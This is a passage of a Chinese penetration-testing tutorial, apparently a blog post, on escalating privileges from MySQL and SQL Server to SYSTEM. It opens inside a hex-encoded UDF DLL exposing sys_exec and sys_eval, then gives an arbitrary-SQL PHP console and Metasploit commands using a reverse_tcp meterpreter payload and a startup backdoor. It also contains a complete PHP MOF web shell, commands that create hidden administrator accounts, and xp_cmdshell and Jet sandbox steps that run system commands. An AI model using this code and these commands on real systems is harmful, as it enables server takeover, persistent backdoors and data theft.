0300004C8BC78BD3488BCE488B5C2430488B7424384883C4205FE98BFEFFFFCCCCCC48894C24084881EC88000000488D0D49260000FF15BB1500004C8B1D342700004C895C24584533C0488D542460488B4C2458E841040000488944245048837C245000744148C744243800000000488D4424484889442430488D4424404889442428488D05F425000048894424204C8B4C24504C8B442458488B54246033C9E8EF030000EB22488B842488000000488905C0260000488D8424880000004883C0084889054D260000488B05A626000048890517250000488B84249000000048890518260000C705EE240000090400C0C705E824000001000000488B05AD2400004889442468488B05A92400004889442470FF15F6140000890558250000B901000000E84E03000033C9FF15E6140000488D0D17160000FF15E1140000833D3225000000750AB901000000E826030000FF15D0140000BA090400C0488BC8FF15CA1400004881C488000000C3CCCC488D0DD9290000E90203000040534883EC20488BD9488B0DEC290000FF15CE14000048894424384883F8FF750B488BCBFF15EA140000EB7EB908000000E8DE02000090488B0DBE290000FF15A01400004889442438488B0DA4290000FF158E1400004889442440488BCBFF15D8140000488BC84C8D442440488D542438E898020000488BD8488B4C2438FF15B814000048890571290000488B4C2440FF15A614000048890557290000B908000000E861020000488BC34883C4205BC34883EC28E847FFFFFF48F7D81BC0F7D8FFC84883C428C3CC48895C2408574883EC20488D1D03160000488D3DFC150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC348895C2408574883EC20488D1DDB150000488D3DD4150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC3CCCCCCCCCCCCCCCCCCCCCCCC488BC1B94D5A0000663908740333C0C34863483C4803C833C0813950450000750CBA0B020000663951180F94C0F3C3CC4C63413C4533C94C8BD24C03C1410FB74014450FB758064A8D4C00184585DB741E8B510C4C3BD2720A8B410803C24C3BD0720F41FFC14883C128453BCB72E233C0C3488BC1C3CCCCCCCCCCCCCCCCCCCC4883EC284C8BC14C8D0D62E2FFFF498BC9E86AFFFFFF85C074224D2BC1498BD0498BC9E888FFFFFF4885C0740F8B4024C1E81FF7D083E001EB0233C04883C428C3CCFF2520130000FF2512130000FF25BC120000FF25BE120000FF25681300004883EC2883FA01751048833D97130000007506FF1537120000B8010000004883C428C3CC48895C2418574883EC20488B05DB21000048836424300048BF32A2DF2D992B0000483BC7740C48F7D0488905C4210000EB76488D4C2430FF153F120000488B5C2430FF15C4110000448BD84933DBFF15C0110000448BD84933DBFF15BC110000488D4C2438448BD84933DBFF15B31100004C8B5C24384C33DB48B8FFFFFFFFFFFF00004C23D848B833A2DF2D992B00004C3BDF4C0F44D84C891D4E21000049F7D34C891D4C210000488B5C24404883C4205FC3CCFF25EA110000FF25EC110000FF25EE110000FF25F0110000FF25F2110000FF256C110000FF255E110000CCCC40534883EC20458B18488BDA4C8BC94183E3F841F600044C8BD17413418B40084D635004F7D84C03D14863C84C23D14963C34A8B1410488B43108B480848034B08F641030F740C0FB6410383E0F048984C03C84C33CA498BC94883C4205BE9C9F6FFFFCC4883EC284D8B4138488BCA498BD1E889FFFFFFB8010000004883C428C3CCFF25E4110000CCCCCCCC40554883EC20488BEA488BD148894D28488B018B08894D24E84DFEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEAC7054D200000FFFFFFFF4883C4205DC340554883EC20488BEAB908000000E8F8FEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEA488B0133C98138050000C00F94C18BC18BC14883C4205DC3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F43800000000000000000000000000000000000000000000000000000000000000000000000000004016008001000000000000000000000000000000000000003040008001000000D0400080010000004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279000000720000000000000000000000000000000000000000000000000000000000000000000000011D0C001DC40B001D740A001D5409001D3408001D3219F017E015D01915080015740A001564090015340800155211C0E41D00000200000027190000091A0000801F0000091A0000211900000F1A0000B01F000000000000010F06000F6407000F3406000F320B70010C02000C01110001060200063202501106020006320230E41D000001000000031C0000691C0000C91F0000000000000904010004420000E41D000001000000971D0000CA1D0000F01F0000CA1D00000104010004420000010A04000A3408000A3206700904010004420000E41D000001000000E4150000EB15000001000000EB150000010F06000F640A000F3408000F520B7021000000E01300000F14000004340000210000000F14000058140000F03300002108020008348C000F14000058140000F03300002108020008548E00E01300000F14000004340000192207001001860009E007D005C0037002600000581F000020040000010A04000A3406000A32067001310400317406000632023001060200063202308034000000000000000000004036000000300000203500000000000000000000A4360000A0300000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F4380000000000000000000000000000680457616974466F7253696E676C654F626A6563740058045669727475616C416C6C6F630000D503536574456E7669726F6E6D656E745661726961626C654100A30043726561746554687265616400004B45524E454C33322E646C6C0000AC04667265650000E7025F70636C6F736500E5046D616C6C6F630000EB025F706F70656E00003B0573797374656D00002B057374726E637079009B0466676574730006057265616C6C6F6300BC04676574656E7600004D5356435239302E646C6C0037015F656E636F64655F706F696E746572004E025F6D616C6C6F635F63727400CE015F696E69747465726D00CF015F696E69747465726D5F650038015F656E636F6465645F6E756C6C002D015F6465636F64655F706F696E74657200E2005F616D73675F65786974000059005F5F435F73706563696669635F68616E646C657200005A005F5F4370705863707446696C7465720083005F5F6372745F64656275676765725F686F6F6B007B005F5F636C65616E5F747970655F696E666F5F6E616D65735F696E7465726E616C0000A4035F756E6C6F636B0085005F5F646C6C6F6E65786974003D025F6C6F636B00E4025F6F6E65786974002504536C6565700031045465726D696E61746550726F636573730000AA0147657443757272656E7450726F63657373004204556E68616E646C6564457863657074696F6E46696C74657200001904536574556E68616E646C6564457863657074696F6E46696C74657200CB024973446562756767657250726573656E7400970352746C5669727475616C556E77696E640000900352746C4C6F6F6B757046756E6374696F6E456E7472790000890352746C43617074757265436F6E7465787400CC0044697361626C655468726561644C69627261727943616C6C73004E035175657279506572666F726D616E6365436F756E7465720066024765745469636B436F756E740000AE0147657443757272656E7454687265616449640000AB0147657443757272656E7450726F636573734964004F0247657453797374656D54696D65417346696C6554696D6500F0046D656D637079000000000000000070B1834B00000000DC3900000100000012000000120000002839000070390000B8390000601000003015000000100000401500003015000020150000E01300003015000050130000C013000030150000501300002011000030150000B0100000D0120000B012000080110000F1390000073A0000243A00003F3A00004B3A00005E3A00006F3A0000783A0000883A0000963A00009F3A0000AF3A0000BD3A0000C53A0000D43A0000E13A0000E93A0000F83A000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E697400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000032A2DF2D992B0000CD5D20D266D4FFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020110000721100002C34000080110000AC12000020340000B0120000C812000078330000D01200004E13000018330000C0130000D813000078330000E01300000F140000043400000F14000058140000F033000058140000BE140000DC330000BE140000D4140000CC330000D41400001B150000BC33000040150000D7150000AC330000E0150000F21500008C330000401600009E16000038340000A0160000F9180000C0320000FC180000311A0000DC320000341A0000711A000018330000741A0000BE1B000028330000CC1B00007C1C0000383300007C1C0000931C000078330000941C0000CC1C000020340000CC1C0000041D000020340000901D0000D11D000058330000F01D0000131E000078330000141E0000C71E000080330000F41E0000571F000038340000581F0000751F000078330000801F0000A31F000030330000B01F0000C91F000030330000C91F0000E21F000030330000F01F0000112000003033000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005860000058020000E4040000000000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D22616D64363422207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E47003000001000000088A1A0A1A8A1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";


         }




         ?>
        ```

     2. 以下是要过本地限制连接mysql数据库显示并执行的php代码:

        ```javascript
        <?php
        $host = 'localhost';
        $username = 'root';
        $password = '123456'; // 注意:出于安全考虑,避免在代码中明文存储密码
        $conn = new mysqli($host, $username, $password);

        if ($conn->connect_error) {
            die("连接失败: " . $conn->connect_error);
        }
        $conn->set_charset("utf8mb4");

        $response = [];

        if ($_SERVER["REQUEST_METHOD"] === "POST") {
            $action = $_POST['action'];
            $database = $_POST['database'];
            if ($database) {
                $conn->select_db($database);
            }

            switch ($action) {
                case 'getTables':
                    $sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = '$database'";
                    $result = $conn->query($sql);
                    while ($row = $result->fetch_assoc()) {
                        $response[] = $row['table_name'];
                    }
                    break;
                case 'getColumns':
                    $table = $_POST['table'];
                    $sql = "SELECT column_name FROM information_schema.columns WHERE table_schema = '$database' AND table_name = '$table'";
                    $result = $conn->query($sql);
                    while ($row = $result->fetch_assoc()) {
                        $response[] = $row['column_name'];
                    }
                    break;
                case 'getRows':
                    $table = $_POST['table'];
                    $column = $_POST['column'];
                    $sql = "SELECT `$column` FROM `$table`";
                    $result = $conn->query($sql);
                    while ($row = $result->fetch_assoc()) {
                        $response[] = $row[$column];
                    }
                    break;
                case 'executeSQL':
                    $sql = $_POST['sql'];
                    $result = $conn->query($sql);
                    if ($result === true) {
                        $response['success'] = "执行成功";
                    } else if ($result) {
                        while ($row = $result->fetch_assoc()) {
                            $response[] = $row;
                        }
                    } else {
                        $response['error'] = "错误: " . $conn->error;
                    }
                    break;
            }

            $conn->close();
            echo json_encode($response);
            exit;
        }

        $databases = [];
        $result = $conn->query("SHOW DATABASES");
        while ($row = $result->fetch_assoc()) {
            $databases[] = $row['Database'];
        }
        $conn->close();
        ?>
        <!DOCTYPE html>
        <html lang="zh-CN">
        <head>
        <meta charset="UTF-8">
        <title>CongSec</title>
        <style>
            body { font-family: Arial, sans-serif; }
            .container {
                display: flex;
                flex-wrap: wrap;  /* 允许子项在必要时换行 */
                align-items: center; /* 中心对齐子项 */
                padding: 10px;
            }
            button {
                margin: 5px;
                padding: 8px 16px;
                background-color: #4CAF50;
                color: white;
                border: none;
                border-radius: 4px;
                cursor: pointer;
                min-width: 120px; /* 最小宽度 */
                white-space: nowrap; /* 防止文字在按钮内换行 */
            }
            button:hover {
                background-color: #45a049;
            }
            div {
                margin: 5px;
            }
            textarea {
                width: 95%; /* 调整宽度以适应屏幕 */
                height: 150px; /* 调整高度 */
                margin: 5px;
            }
        </style>
        <script>
        function fetchTables(database) {
            fetch('', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: 'action=getTables&database=' + encodeURIComponent(database)
            })
            .then(response => response.json())
            .then(data => {
                const container = document.getElementById('tables');
                container.innerHTML = '';
                data.forEach(table => {
                    const div = document.createElement('div');
                    const button = document.createElement('button');
                    button.textContent = table;
                    button.onclick = () => fetchColumns(database, table);
                    div.appendChild(button);
                    container.appendChild(div);
                });
            });
        }

        function fetchColumns(database, table) {
            fetch('', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: 'action=getColumns&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table)
            })
            .then(response => response.json())
            .then(data => {
                const container = document.getElementById('columns');
                container.innerHTML = '';
                data.forEach(column => {
                    const div = document.createElement('div');
                    const button = document.createElement('button');
                    button.textContent = column;
                    button.onclick = () => fetchRows(database, table, column);
                    div.appendChild(button);
                    container.appendChild(div);
                });
            });
        }

        function fetchRows(database, table, column) {
            fetch('', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: 'action=getRows&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table) + '&column=' + encodeURIComponent(column)
            })
            .then(response => response.json())
            .then(data => {
                const container = document.getElementById('rows');
                container.innerHTML = '';
                data.forEach(value => {
                    const div = document.createElement('div');
                    div.textContent = value;
                    container.appendChild(div);
                });
            });
        }

        function executeSQL() {
            const sql = document.getElementById('sqlText').value;
            fetch('', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: 'action=executeSQL&sql=' + encodeURIComponent(sql)
            })
            .then(response => response.json())
            .then(data => {
                const container = document.getElementById('sqlResult');
                container.innerHTML = '';
                if (data.error) {
                    container.textContent = data.error;
                } else if (data.success) {
                    container.textContent = data.success;
                } else {
                    data.forEach(row => {
                        const div = document.createElement('div');
                        div.textContent = JSON.stringify(row);
                        container.appendChild(div);
                    });
                }
            });
        }
        </script>
        </head>
        <body>
        <h1>选择数据库</h1>
        <div class="container" id="databases">
        <?php foreach ($databases as $db): ?>
            <button onclick="fetchTables('<?php echo $db; ?>')"><?php echo $db; ?></button>
        <?php endforeach; ?>
        </div>
        <h2>表信息</h2>
        <div class="container" id="tables"></div>
        <h2>列信息</h2>
        <div class="container" id="columns"></div>
        <h2>字段信息</h2>
        <div class="container" id="rows"></div>
        <h2>执行SQL</h2>
        <div class="container" id="executeSQL">
            <textarea id="sqlText"></textarea>
            <button onclick="executeSQL()">执行</button>
        </div>
        <h2>SQL执行结果</h2>
        <div class="container" id="sqlResult"></div>
        </body>
        </html>
        ```

     3. 访问该脚本,输入数据库的账号和密码

        1. ![image](https://img-blog.csdnimg.cn/img_convert/e42970abfebcad5135eaaaed0f9d66ba.png)
     4. 点击导出可以在目标主机的脚本提示目录中发现有udf.dll文件生成

        1. ![image](https://img-blog.csdnimg.cn/img_convert/2f4f2f00e1e3f092ee7c1f151efdc166.png)
        2. ![image](https://img-blog.csdnimg.cn/img_convert/1c10dc66328c5fc092cde34969cea4b1.png)
     5. 将dll文件绑定sys_eval函数

        1. ![image](https://img-blog.csdnimg.cn/img_convert/d714a8bff152c3d355379aba0691a37b.png)
     6. 使用`select cmdshell('whoami')`命令可以看到是系统管理员身份

        1. ![image](https://img-blog.csdnimg.cn/img_convert/1c01ef448a0a760edbc661a8a74ebcb4.png)
  2.

     #### 只有数据库权限

     1.

        ##### 条件

        1. 数据库外联开启

        2. secure-file-priv没进行目录限制

           1. ![image](https://img-blog.csdnimg.cn/img_convert/92de3f927804fa2d3a646d245dfa1ee7.png)
        3. 具有数据库帐号密码

     2.

        ##### 复现

        1. 靶场:php 5.4.45 apche 2.4.23 iis win2008 mysql 5.5.53

        2. 首先我们要创建一个模拟可以外联的sql数据库来模拟攻击者已经获取了一个普通用户的数据库,以下是开启外联的步骤

           1. 在mysql数据库中主机为%即为容许所有主机来连接

              1. ![image](https://img-blog.csdnimg.cn/img_convert/1cf5a28b6511a3004536b774ea77e380.png)

              2. 成功连接

                 1. ![image](https://img-blog.csdnimg.cn/img_convert/46733503b81d6da1bfab990f69b6ab42.png)
        3.

           ###### msf工具

           1. udf生成的文件路径:

              1. mysql5.2导出目录c:/windows或system32

              2. mysql=5.2导出安装目录/lib/plugin/

                 1. ![image](https://img-blog.csdnimg.cn/img_convert/a9191ebfb66e2549e2a70dacbef65404.png)
              3. 安装目录

                 1. ![image](https://img-blog.csdnimg.cn/img_convert/990e9098a8fd30cfb8cd355ef6df8b43.png)
           2. 通过msf工具生成`eqoWcBgh.dll`文件

              1.

                 ```python
                  use exploit/multi/mysql/mysql_udf_payload
                  set payload windows/meterpreter/reverse_tcp 
                  set password root
                  set  rhosts 192.168.72.139
                  run
                 ```

              2. ![image](https://img-blog.csdnimg.cn/img_convert/85e0b40eaad6727cf04862a405675b17.png)
           3. 创建函数绑定dll

              1. ![image](https://img-blog.csdnimg.cn/img_convert/7a88d02767827db032dcffaa2fe42c01.png)
           4. 可以执行任意命令,**拿下webshell**

              1. ![image](https://img-blog.csdnimg.cn/img_convert/3bc1fd8a45fbcd3a65d32ba1573c18ad.png)
           5. 利用msf执行以下命令来创建**启动项开机自启后门**

              1.

                      use exploit/windows/mysql/mysql_start_up 
                      set rhosts 192.168.72.139
                      set username root
                      set password root 
                      run

              2. ![image](https://img-blog.csdnimg.cn/img_convert/f216bdf85e93cc1e8c31d451c2a435b2.png)
        4.

           ###### sql语句提权

           1. 在数据库中执行一下脚本即可拿到system权限

              1. ![image](https://img-blog.csdnimg.cn/img_convert/b4e14c3ec75ece3e7f7be017ebd952a7.png)
  ## MOF提权

  1.

     ##### 前言

     1. mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。【MOF提权只能用于Windows系统提权,Linux提权无法使用】
     2. xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。
  2.

     ##### 条件

     1. mysql有读写 C:/Windows/system32/wbem/mof 的权限
     2. secure-file-priv参数不为null
     3. 适用于win2003更早的版本
  3.

     ##### 复现

     1.

        ###### msf工具

        1. 使用msf工具来提权即可

           1.

              ```python
               use exploit/windows/mysql/mysql_mof

               # 设置payload
               set payload windows/meterpreter/reverse_tcp

               # 设置目标 MySQL 的基础信息
               set rhosts 192.168.72.139
               set username root
               set password root
               run
              ```

     2.

        ###### php脚本提权

        1. 将脚本通过文件上传到可访问路径并用数据库账号和密码进行连接即可

           1. ![image](https://img-blog.csdnimg.cn/img_convert/baaeb98dd40e56b64876c9d76ea0e0e0.png)

           2. 提权脚本:

              1.

                 ```python
                  <?php 
                  $path="c:/ini.txt"; 
                  session_start(); 
                  if(!empty($_POST['submit'])){ 
                  setcookie("connect"); 
                  setcookie("connect[host]",$_POST['host']); 
                  setcookie("connect[user]",$_POST['user']); 
                  setcookie("connect[pass]",$_POST['pass']); 
                  setcookie("connect[dbname]",$_POST['dbname']); 
                  echo "<script>location.href='?action=connect'</script>"; 
                  } 
                  if(empty($_GET["action"])){ 
                  ?> 

                  <html> 
                  <head><title>Win MOF Shell</title></head> 
                  <body> 
                  <form action="?action=connect" method="post"> 
                  Host: 
                  <input type="text" name="host" value="127.0.0.1"><br/> 
                  User: 
                  <input type="text" name="user" value="root"><br/> 
                  Pass: 
                  <input type="password" name="pass" value="root"><br/> 
                  DB:   
                  <input type="text" name="dbname" value="mysql"><br/> 
                  <input type="submit" name="submit" value="Submit"><br/> 
                  </form> 
                  </body> 
                  </html> 

                  <?php 
                  exit; 
                  } 
                  if ($_GET[action]=='connect') 
                  { 
                  $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
                  echo "<form action='' method='post'>"; 
                  echo "Cmd:"; 
                  echo "<input type='text' name='cmd' value='$strCmd'?>"; 
                  echo "<br>"; 
                  echo "<br>"; 
                  echo "<input type='submit' value='Exploit'>"; 
                  echo "</form>"; 
                  echo "<form action='' method='post'>"; 
                  echo "<input type='hidden' name='flag' value='flag'>"; 
                  echo "<input type='submit'value=' Read  '>"; 
                  echo "</form>"; 
                  if (isset($_POST['cmd'])){ 
                  $strCmd=$_POST['cmd']; 
                  $cmdshell='cmd /c '.$strCmd.'>'.$path; 
                  $mofname="c:/windows/system32/wbem/mof/system.mof"; 
                  $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") 

                  instance of __EventFilter as \$EventFilter 
                  { 
                    EventNamespace = \"Root\\\\\\\\Cimv2\"; 
                    Name  = \"filtP2\"; 
                    Query = \"Select * From __InstanceModificationEvent \" 
                        \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" 
                        \"And TargetInstance.Second = 5\"; 
                    QueryLanguage = \"WQL\"; 
                  }; 

                  instance of ActiveScriptEventConsumer as \$Consumer 
                  { 
                    Name = \"consPCSV2\"; 
                    ScriptingEngine = \"JScript\"; 
                    ScriptText = 
                    \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; 
                  }; 

                  instance of __FilterToConsumerBinding 
                  { 
                    Consumer = \$Consumer; 
                    Filter = \$EventFilter; 
                  };"; 
                  mysql_select_db($_COOKIE["connect"]["dbname"],$conn); 
                  $sql1="select '$payload' into dumpfile '$mofname';"; 
                  if(mysql_query($sql1)) 
                    echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); 
                  mysql_close($conn); 
                  } 

                  if(isset($_POST['flag'])) 
                  { 
                    $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
                    $sql2="select load_file(\"".$path."\");"; 
                    $result2=mysql_query($sql2); 
                    $num=mysql_num_rows($result2); 
                    while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { 
                      echo "<hr/>"; 
                      echo '<pre>'. $row[0].'</pre>'; 
                    } 
                    mysql_close($conn); 
                  } 
                  } 
                  ?>
                 ```

        2. 连接上即可执行任意命令

           1. ![image](https://img-blog.csdnimg.cn/img_convert/3fd00aa4e9e68692386e04462522a5ff.png)
        3. 接下来就进行权限的维持

           1. 创建隐藏用户`net user cong$ 12456 /add & net localgroup administrators cong$ /add`
           2. ![image](https://img-blog.csdnimg.cn/img_convert/6db008ec90e3b6f92c061c166857c9ac.png)
  ## sqlserver提权

  1.

     #### 前言

     1. 在SQL Server中,如果攻击者能够获取到sa(系统管理员)账户的密码,那么他们实际上已经拥有了非常高的权限,因为sa账户是SQL Server中的超级用户,具有对数据库服务器的完全控制权。

     2. 关于执行操作系统命令的权限,特别是通过SQL Server的 xp_cmdshell或其他机制,这取决于SQL Server的配置以及运行SQL Server的 Windows操作系统账户的安全设置。

     3. 敏感文件名称

        1.

           ```python
            web.config 
            config.asp 
            conn.aspx 
            database.aspx
           ```

  2.

     #### 条件

     1. 服务器开启数据库服务
     2. 获取到最高权限用户密码  
        (除Access数据库外,其他数据库基本都存在数据库提权的可能)
  3.

     #### xp_cmdshell提权

     1.

        ###### 复现

        1. 通过连接数据库执行数据库语句

           1. 开启xp_cmdshell命令

              1.

                 ```python
                  EXEC sp_configure 'show advanced options', 1
                  RECONFIGURE;
                  EXEC sp_configure 'xp_cmdshell', 1;
                  RECONFIGURE;
                 ```

           2. 执行命令语句`EXEC master.dbo.xp_cmdshell 'whoami'`即可

  4.

     #### 沙盒提权

     1.

        ###### 介绍

        1. 沙盒模式是数据库的一种安全功能。在沙盒模式下,只对控件和字段属性中的安全且不含恶意代码的表达式求值。如果表达式不使用可能以某种方式损坏数据的函数或属性,则可认为它是安全的。利用前提需要sqlserver sysadmin账户服务器权限为system(sqlserver2019默认被降权为mssql),服务器拥有 jet.oledb.4.0 驱动。

        2. 局限:(1)Microsoft.jet.oledb.4.0一般在32位操作系统上才可以 (2)Windows 2008以上 默认无 Access 数据库文件, 需要自己上传 sqlserver2015默认禁用Ad Hoc Distributed Queries,需要开启。

        3. 沙盒模式SandBoxMode参数含义(默认是2)

           `0`:在任何所有者中禁止启用安全模式

           `1` :为仅在允许范围内

           `2` :必须在access模式下

           `3`:完全开启

           ‍
     2.

        ###### 复现

        1. 执行以下两条命令,启用高级选项

           1.

              ```php
               exec sp_configure 'show advanced options',1;reconfigure;
               exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
              ```

        2. 修改注册表

           1. `exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;`
        3. 使用 SQL Server 的扩展存储过程 `xp_regread` 来从 Windows 注册表中读取 `SandBoxMode` 键的值。

           1. `exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode';`
        4. 执行系统命令

           1.

              ```php
               select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user qianxun 123456 /add")')
               select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators qianxun /add")')
              ```

        5. 恢复配置

           1.

              ```php
               exec master..xp_regwrite 'HKEY_LOCALMACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;
